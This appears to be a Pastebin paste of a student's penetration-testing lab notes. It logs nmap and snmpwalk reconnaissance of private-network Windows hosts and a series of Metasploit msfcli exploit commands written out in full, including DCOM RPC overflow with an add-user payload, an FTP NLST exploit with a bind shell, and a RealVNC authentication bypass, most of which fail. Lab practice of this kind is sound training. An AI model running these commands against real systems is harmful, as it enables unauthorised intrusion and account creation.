Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- 1. Using nmap to gather information about 192.168.13.201. Obviously this server is getting a shit load of scanning, thus nmap sometimes repo
- rt that this server is down.
- 2. Previously gather information shows that most windows servers has port 135 enable. Checks msfcli reveals the following:
- ./msfcli |grep windows -i|grep rpc -i
- exploit/windows/brightstor/mediasrv_sunrpc CA BrightStor ArcServe Media Service Stack Buffer Overflow
- exploit/windows/dcerpc/ms03_026_dcom Microsoft RPC DCOM Interface Overflow exploit/windows/dcerpc/ms05_017_msmq Microsoft Message Queueing Service Path Overflow
- exploit/windows/dcerpc/ms07_065_msmq Microsoft Message Queueing Service DNS Name Path Overflow
- exploit/windows/dcerpc/msdns_zonename Microsoft DNS RPC Service extractQuotedChar() Overflow (TCP)
- exploit/windows/smb/msdns_zonename Microsoft DNS RPC Service extractQuotedChar() Overflow (SMB)
- exploit/windows/smb/netidentity_xtierrpcpipe Novell NetIdentity Agent XTIERRPCPIPE Named Pipe Buffer Overf
- low.
- 3. Try the 2nd one - DCOM Interface Overflow:
- ./msfcli exploit/windows/dcerpc/ms03_026_dcom P
- ./msfcli exploit/windows/dcerpc/ms03_026_dcom PAYLOAD=windows/adduser O ./msfcli exploit/windows/dcerpc/ms03_026_dcom PAYLOAD=windows/adduser RHOST=192.168.13.231 C
- 3.a this command reponses that server 231 isn't supported
- ./msfcli exploit/windows/dcerpc/ms03_026_dcom PAYLOAD=windows/adduser RHOST=192.168.13.231 E
- Exploit failed: DCERPC FAULT => nca_s_fault_access_denied
- 3.b I ignore the failed check and go ahead to try to sent the payload. Failed as expected. I do realize that in real life situation this wou
- ld crash the server process, but with the lab servers being revertable I decided to go ahead. 4. Looking at the NMAP results for other clues. I picked 227 server, it seems to have lower versions of softwares.
- 5. a snmpwalk feels like the first choice: results are: 227_ports.log 227_services.log 227_software.log and 227_users.log
- 6. the "nc.exe" service and port 4444 being lisenning to reveals that this server might has been compromised.
- 7. nc -vv 192.168.13.227 4444 returns "connection refused" error. My guess is that somebody is having a remote shell? I should use other por
- ts if I am getting the shell then.
- 8. 192.168.12.65 is the guy who is connecting to this port. He also connects to the 1352 port. No luck on nc to that port either.
- 9. the service metsvc.exe agrees that this is a compromised server running meterpreter.
- 10. The server name is in its netbios, as SRV2
- 11. Let's look at the M$ ESMTP service.
- ./msfcli |grep -i ESMTP - got nothing
- 12. Looking at the ftpd service.
- ./msfcli exploit/windows/ftp/microsoft_ftpd_nlst PAYLOAD=windows/shell_bind_tcp FTPUSER=ftp FTPPASS=ftp@ftp.com RHOST=192.168.13.227
- LPORT=4325 E
- 13. No luck, 550 GQCYLIOBRL: Access is denied. The root directory of the FTP server is not writeable. I might came back here when I got an account that has file system access.
- 14. Now try RealVNC. Apprently there is only one exploit exist but it's client side for the view thus no luck either
- 14b. Well, it appears that MSF2 has something special for realVNC... realvnc_41_bypass
- ./msfcli realvnc_41_bypass LHOST=127.0.0.1 RHOST=192.168.13.227 RPORT=5900 E
- Why LHOST has to be 127.0.0.1 ?? but after the tightVNC viewer show up, windows ask to password to login again...
- 15. Found two exploits for port 135:
- http://www.metasploit.com/modules/exploit/windows/dcerpc/ms03_026_dcom
- payload can be sent without any responses. Adduser payload failed.
- 16. Using nmap to banner grab ports from snmpwalk one by one, discovered http://192.168.13.227:6532 web service but only limited to certain ip addresses.
- 17. Try IIS 5.0 exploits in MSF2 and MSF3, countless fails.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement